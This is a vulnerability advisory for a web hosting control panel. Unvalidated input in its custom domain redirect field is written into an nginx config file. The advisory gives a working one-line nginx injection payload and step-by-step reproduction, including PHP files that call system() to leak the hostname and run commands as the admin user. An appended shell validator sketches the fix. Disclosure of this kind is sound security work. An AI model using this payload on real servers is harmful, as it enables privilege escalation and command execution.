CVSS3: 8.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS2: 6.5 Medium
Access Vector: NETWORK
Access Complexity: LOW
Authentication: SINGLE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
EPSS: 0.001 Low
Percentile: 40.4%
Improper input validation allows an attacker to escalate privileges and crash the nginx server.
There is no input validation in v-add-web-domain-redirect#L82 or on the "v-redirect-custom" input of the "Edit Web Domain" page; inputs are written directly to the /home/user/conf/web/domain.com/nginx.conf_redirect file. This file is included in the /home/user/conf/web/domain.com/nginx.conf file.
/home/user/conf/web/domain.com/nginx.conf
...
location ~ /\.(?!well-known\/|file) {
deny all;
return 404;
}
include /home/test/conf/web/poc.com/nginx.conf_*;
}
/home/user/conf/web/domain.com/nginx.conf_redirect file before payload (input is "asd")
if ($host != "asd") {
return 301 $scheme://asd$request_uri;
}
/home/user/conf/web/domain.com/nginx.conf_redirect file after payload
if ($host != "redStar$request_uri; ## " ) {} location /adminShell.php { alias /home/test/web/poc.com/public_html/; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-server.talhagunay.com.sock; } if ( $host = false ) { #") {
return 301 $scheme://redStar$request_uri; ## " ) {} location /adminShell.php { alias /home/test/web/poc.com/public_html/; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-server.talhagunay.com.sock; } if ( $host = false ) { #$request_uri;
}
Payload (has to be one line!)
redStar$request_uri; ## " ) {} location /adminShell.php { alias [FULLPATHINFO]; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-[HOSTNAME].sock; } if ( $host = false ) { #
[0] Log in as user
[1] Create a domain in the dashboard
[2] Go to Files in the top bar
[3] Go to the "public_html" folder and create a PHP file with the contents below, visit the PHP file with a browser, and prepare your payload with the full path and hostname information.
x.php
<?php
echo getcwd();
echo "<br>";
system("hostname");
[4] Go to the "Edit Web Domain" page in the dashboard, select "Enable domain redirection", then select "Redirect visitors to a custom domain or web address", enter the payload in the text box and click the save button.
[5] Go to the "public_html" folder and create a PHP file named adminShell.php
adminShell.php
<?php
system("id; whoami;");
[6] Visit /adminShell.php with a browser; commands run as the "admin" user.
https://drive.google.com/file/d/1ynnw0C-5dbtxW21aLt4jemUPrCthyXEj/view?usp=sharing
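The missing check described above, sketched as an added example (not code from the project or the original report): an allow-list validator that refuses any redirect target containing characters the nginx parser treats as syntax, applied before the value is interpolated into nginx.conf_redirect. The function names are hypothetical, and the example assumes the field holds a bare host[:port] value like the "asd" sample.

```shell
#!/bin/sh
# Added example, not the project's code. Function names are hypothetical.
# Assumes the redirect target is a bare host[:port], like the "asd" sample.
LC_ALL=C; export LC_ALL   # make the [A-Za-z] ranges byte-exact

is_safe_redirect_host() {
    value=$1
    # Non-empty, and no longer than a 253-char name plus ":65535".
    [ -n "$value" ] && [ "${#value}" -le 259 ] || return 1
    # Allow-list: refuse anything other than letters, digits, ".", "-", ":".
    # That excludes quotes, ";", "{", "}", "$", "#" and whitespace, which the
    # payload needs in order to leave the quoted string and add directives.
    case $value in
        *[!A-Za-z0-9.:-]*) return 1 ;;
    esac
    host=${value%%:*}
    case $value in
        *:*) port=${value#*:}
             # Port must be 1-5 digits and at most 65535.
             case $port in ''|*[!0-9]*) return 1 ;; esac
             [ "${#port}" -le 5 ] && [ "$port" -le 65535 ] || return 1 ;;
    esac
    # Host: no empty label, no leading or trailing dot or hyphen.
    case $host in
        ''|.*|*.|-*|*-|*..*) return 1 ;;
    esac
    return 0
}

# Emit the redirect block in the template shown on the page, but only for
# input that passed validation; rejected input never reaches the config file.
render_redirect() {
    is_safe_redirect_host "$1" || { echo "rejected redirect target" >&2; return 1; }
    printf 'if ($host != "%s") {\n    return 301 $scheme://%s$request_uri;\n}\n' "$1" "$1"
}
```

Running `nginx -t` on the generated configuration before reloading is a useful second check, since a value that breaks the syntax is then caught before it can take the server down.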